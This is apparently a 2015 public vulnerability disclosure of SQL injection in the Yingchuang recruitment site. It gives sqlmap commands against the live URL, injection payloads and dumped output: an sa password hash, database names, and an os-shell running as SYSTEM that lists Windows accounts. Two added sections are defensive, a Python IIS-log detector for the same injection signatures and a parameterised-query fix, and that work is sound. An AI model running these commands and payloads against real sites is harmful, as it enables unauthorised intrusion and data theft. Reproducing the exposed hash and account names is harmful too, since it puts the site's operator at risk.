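2015-09-08: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2015-10-23: The vendor has actively ignored the vulnerability; details are disclosed to the public.
The Yingchuang recruitment site (英创人才网) has a SQL injection vulnerability (sa privileges), leaking information on a large number of tables. An os-shell can be obtained; through the os-shell I found that 360 Safeguard (360安全卫士) is installed on the server, and quite a few high-risk service ports are open. Hope this isn't ignored. So sleepy, I'm going to be late and get scolded again tomorrow...
Injection testing with sqlmap.
Injection URL: http://www.yingchuang.com/search/orderdetail/?oid=00043269
1. Basic test: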
sqlmap.py -u "http://www.yingchuang.com/search/orderdetail/?oid=00043269" --dbs --current-user --users --is-dba --passwords --threads=10
2. Obtain an os-shell:
sqlmap.py -u "http://www.yingchuang.com/search/orderdetail/?oid=00043269" --os-shell
Parameter: oid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: oid=00043269' AND 7546=7546 AND 'HObb'='HObb
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: oid=00043269' AND 3944=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3944=3944) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(112)+CHAR(113))) AND 'VdrD'='VdrD
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: oid=00043269';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: oid=00043269' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: oid=00043269' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CH
sqlmap resumed the following injection point(s) from stored session:
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
current user: 'sa'
current user is DBA: True
database management system users [1]:
[*] sa
database management system users password hashes:
[*] sa [1]:
    password hash: 0x01004086ceb681aedaccfde560937a35577e4362274b259b41d8
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 81aedaccfde560937a35577e4362274b259b41d8
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] sectordb
[*] tempdb
[*] workdb
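Added example, not part of the original report: the five technique types in the sqlmap output above leave recognizable patterns in the web server's request log. The code below matches them in the `cs-uri-query` field of an IIS W3C log and uses `time-taken` to tell whether a `WAITFOR DELAY` probe actually ran; the log lines, client addresses and field selection are constructed.

```python
import re
from urllib.parse import unquote_plus

# One signature per technique type sqlmap reported for the oid parameter.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*AND\s+(\d+)=\1\b", re.I),
    "error-based": re.compile(r"=\s*CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    "stacked queries": re.compile(r"';\s*WAITFOR\s+DELAY\b", re.I),
    "time-based blind": re.compile(r"'\s+WAITFOR\s+DELAY\b", re.I),
    "UNION query": re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I),
}
DELAY = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.I)

# Constructed IIS W3C log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2015-09-08 01:10:02 GET /search/orderdetail/ oid=00043269 198.51.100.7 200 46
2015-09-08 01:12:40 GET /search/orderdetail/ oid=00043269%27%20AND%207546%3D7546%20AND%20%27HObb%27%3D%27HObb 203.0.113.9 200 51
2015-09-08 01:12:44 GET /search/orderdetail/ oid=00043269%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 203.0.113.9 200 5062
2015-09-08 01:12:51 GET /search/orderdetail/ oid=00043269%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 203.0.113.9 500 38
"""


def scan(log_text):
    """Return one finding per logged request whose query matches a signature."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = unquote_plus(row.get("cs-uri-query", ""))
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if not hits:
            continue
        # A WAITFOR probe only shows that injected SQL ran if the response was
        # held for at least the requested delay (time-taken is milliseconds).
        m = DELAY.search(query)
        wanted_ms = 0
        if m:
            hours, minutes, seconds = map(int, m.groups())
            wanted_ms = ((hours * 60 + minutes) * 60 + seconds) * 1000
        executed = bool(m) and int(row.get("time-taken", 0)) >= wanted_ms
        findings.append({"client": row["c-ip"], "techniques": hits,
                         "delay_executed": executed})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `delay_executed` set is the one to escalate first: it means the database ran attacker-supplied SQL, not merely that a probe was sent.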
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
Database: workdb
[650 tables]
os-shell proof:
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
[01:28:12] [INFO] the SQL query used returns 1 entries
[01:28:12] [INFO] retrieved: nt authority\\\\system
command standard output [1]:
[*] nt authority\system
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
[01:31:21] [INFO] the SQL query used returns 9 entries
[01:31:22] [INFO] retrieved:
[01:31:22] [INFO] retrieved: \\\\\\\\ のユーザー アカウント
[01:31:23] [INFO] retrieved:
[01:31:23] [INFO] retrieved: ------------------------------------------------...
[01:31:24] [INFO] retrieved: Administrator ASPNET ...
[01:31:24] [INFO] retrieved: ftpuser god ...
[01:31:25] [INFO] retrieved: influx inte ...
[01:31:25] [INFO] retrieved: IWAM_SHDB-TEST nakatani ...
[01:31:26] [INFO] retrieved: qihua staffdata ...
I found that remote desktop port 3389 is open on the host, but unfortunately it is on the internal network.
A look at the programs running on it (360 is actually running on the server!!!)
So sleepy, I'll stop here. Hope this isn't ignored.
Add filtering.
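One way to apply this fix, as an added example that is not the site's code: the affected application is ASP.NET on SQL Server, so Python's sqlite3 stands in here, and the table, the function names and the 8-digit format rule for `oid` are assumptions. It runs the boolean-based payload from the sqlmap output through a concatenated query and through a validated, bound one.

```python
import re
import sqlite3

# Assumption: order ids are exactly 8 digits, like the 00043269 in the report.
OID_FORMAT = re.compile(r"\d{8}")

# Boolean-based blind payload copied from the sqlmap output on this page.
PAGE_PAYLOAD = "00043269' AND 7546=7546 AND 'HObb'='HObb"


def make_db():
    """In-memory stand-in for the order table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (oid TEXT PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO orders VALUES ('00043269', 'constructed sample order')")
    return db


def lookup_concatenated(db, oid):
    """Flawed pattern: the request parameter becomes part of the SQL text."""
    sql = "SELECT title FROM orders WHERE oid = '" + oid + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, oid, validate=True):
    """Hardened pattern: allow-list the format, then bind the value."""
    if validate and not OID_FORMAT.fullmatch(oid):
        raise ValueError("oid must be exactly 8 digits")
    # The driver sends the value separately from the statement, so quotes
    # and keywords inside it are compared as data, never parsed as SQL.
    return db.execute("SELECT title FROM orders WHERE oid = ?", (oid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Concatenation: the payload's AND clauses are evaluated by the database,
    # so the row for 00043269 comes back.
    print("concatenated:", lookup_concatenated(db, PAGE_PAYLOAD))
    # Binding alone: the whole string is compared to the oid column, no match.
    print("bound only:  ", lookup_bound(db, PAGE_PAYLOAD, validate=False))
    # Binding plus format check: rejected before any query is issued.
    try:
        lookup_bound(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("validated:   rejected,", exc)
```

The format check narrows what reaches the database, but the bound parameter is what removes the injection; running the application under a login that is not `sa` limits what any remaining flaw can reach.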
Unable to reach the vendor, or the vendor actively declined.